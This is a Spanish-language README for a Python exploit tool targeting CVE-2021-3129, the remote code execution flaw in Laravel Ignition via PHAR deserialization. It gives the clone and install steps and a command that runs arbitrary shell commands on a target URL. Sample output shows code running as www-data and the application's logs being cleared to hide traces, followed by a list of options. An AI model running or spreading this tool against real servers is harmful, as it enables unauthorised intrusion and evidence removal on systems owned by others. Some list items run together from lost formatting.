
Exploit en Python para CVE-2021-3129 que automatiza la deserialización PHAR para ejecutar comandos arbitrarios en endpoints vulnerables de Laravel Ignition.
Este es un script de exploit en Python para CVE-2021-3129, una vulnerabilidad de ejecución remota de código en Laravel cuando el paquete Ignition está instalado. Esta vulnerabilidad permite a un atacante ejecutar comandos arbitrarios del sistema a través de la deserialización PHAR.
phpggcid, whoami, etc.)requestsClona el repositorio:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
Instala los paquetes Python requeridos:
pip install requests
Ejecuta el script con el objetivo y el comando deseados:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
Ejemplo de salida:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (obligatorio): La URL de la aplicación Laravel vulnerable.--cmd (opcional): El comando a ejecutar en el objetivo (por defecto: whoami).--log_path (opcional): La ruta del archivo de registro a utilizar (por defecto: ../storage/logs/laravel.log).
